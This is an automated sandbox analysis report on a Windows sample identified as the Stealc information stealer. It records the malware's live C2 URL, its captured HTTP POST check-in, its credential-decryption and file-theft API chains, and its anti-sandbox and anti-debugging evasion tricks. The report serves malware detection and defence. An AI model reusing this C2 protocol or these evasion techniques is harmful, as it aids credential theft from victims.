Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538175
MD5:ffb497d86a175802a94beb58ef45bcbf
SHA1:16e0858579f97e8efaf3adc83eb9c445848f2c81
SHA256:fecb47b6a0108dd26752fed4b29cf8f4d2b8833e07a2b7300e9fbe3047763d4d
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FFB497D86A175802A94BEB58EF45BCBF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4480JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4480JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.1b0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-20T18:13:03.918563+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.1b0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_001BC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_001B7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_001B9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_001B9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_001C8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_001BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_001BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_001BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_001BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BF68A FindFirstFileA,0_2_001BF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001B16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 45 46 35 36 43 37 46 41 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"49EF56C7FA3C2002295620------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"doma------IIJKJDAFHJDHIEBGCFID--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_001B4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 45 46 35 36 43 37 46 41 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"49EF56C7FA3C2002295620------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"doma------IIJKJDAFHJDHIEBGCFID--
                Source: file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
                Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
                Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
                Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
                Source: file.exe, 00000000.00000002.2074713980.0000000000F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpt5b
                Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.378

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698E00_2_005698E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057E1320_2_0057E132
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0048B1C90_2_0048B1C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057FA490_2_0057FA49
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005882E60_2_005882E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B0A920_2_004B0A92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EA30C0_2_004EA30C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006403A90_2_006403A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00589C6C0_2_00589C6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057ACE60_2_0057ACE6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057C4990_2_0057C499
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058158E0_2_0058158E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504ED10_2_00504ED1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058EEF10_2_0058EEF1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00586F580_2_00586F58
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060B75D0_2_0060B75D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00584FDE0_2_00584FDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00582F8C0_2_00582F8C
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001B45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: qluozxrq ZLIB complexity 0.9947801902823424
                Source: file.exe, 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001C9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_001C3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\X817RVFQ.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1869824 > 1048576
                Source: file.exeStatic PE information: Raw size of qluozxrq is bigger than: 0x100000 < 0x1a2600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.1b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qluozxrq:EW;pbwitchi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qluozxrq:EW;pbwitchi:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001C9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cc3eb should be: 0x1d340a
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: qluozxrq
                Source: file.exeStatic PE information: section name: pbwitchi
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044984E push ecx; mov dword ptr [esp], esi0_2_00449858
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044984E push ecx; mov dword ptr [esp], ebp0_2_0044988A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CB035 push ecx; ret 0_2_001CB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067385B push ecx; mov dword ptr [esp], 0486BBD4h0_2_00673981
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067385B push 509B9511h; mov dword ptr [esp], ebx0_2_00673990
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F1006 push 0A940F00h; mov dword ptr [esp], edx0_2_004F1054
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E02A push 7E1416A2h; mov dword ptr [esp], edi0_2_0061E056
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E02A push ebp; mov dword ptr [esp], 19D6A100h0_2_0061E073
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E02A push 0E2DC856h; mov dword ptr [esp], esi0_2_0061E096
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E83B push edi; mov dword ptr [esp], ecx0_2_0061E859
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E83B push 2B0D3270h; mov dword ptr [esp], edi0_2_0061E8A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AD8FB push 002C201Ah; mov dword ptr [esp], edi0_2_005AD903
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F08FC push ebp; mov dword ptr [esp], edx0_2_005F0954
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006630CB push 018C8F89h; mov dword ptr [esp], edi0_2_006639AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006630CB push ebx; mov dword ptr [esp], ebp0_2_006639B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698E0 push 07DE2EC4h; mov dword ptr [esp], ebx0_2_00569946
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698E0 push 1AAAEA60h; mov dword ptr [esp], eax0_2_005699FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698E0 push eax; mov dword ptr [esp], ebx0_2_00569A3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698E0 push ebx; mov dword ptr [esp], 1A2BF7F5h0_2_00569A98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AA092 push 2B0D67A4h; mov dword ptr [esp], ebp0_2_005AA17D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006768AE push 74CA9193h; mov dword ptr [esp], esi0_2_006768B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064796A push 6887B790h; mov dword ptr [esp], edi0_2_006479D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00666933 push esi; mov dword ptr [esp], ebp0_2_00666A16
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D493E push 677ACDEBh; mov dword ptr [esp], esi0_2_005D4962
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057E132 push esi; mov dword ptr [esp], edx0_2_0057E168
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057E132 push ecx; mov dword ptr [esp], ebp0_2_0057E2A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057E132 push ebp; mov dword ptr [esp], 709674FCh0_2_0057E326
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057E132 push edx; mov dword ptr [esp], eax0_2_0057E375
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057E132 push ebx; mov dword ptr [esp], 6E7FD838h0_2_0057E385
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057E132 push 3494F4F7h; mov dword ptr [esp], eax0_2_0057E3DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057E132 push 5AC3A65Dh; mov dword ptr [esp], ebp0_2_0057E4FA
                Source: file.exeStatic PE information: section name: qluozxrq entropy: 7.954062792540728

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001C9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13762
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593E33 second address: 593E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C067h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5931D1 second address: 5931D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5931D7 second address: 5931DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5931DC second address: 5931E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5931E2 second address: 5931FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C069h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59336C second address: 593387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F2398D03456h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5934F5 second address: 593523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F239852C05Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593523 second address: 593535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D0345Eh 0x00000009 rdtsc
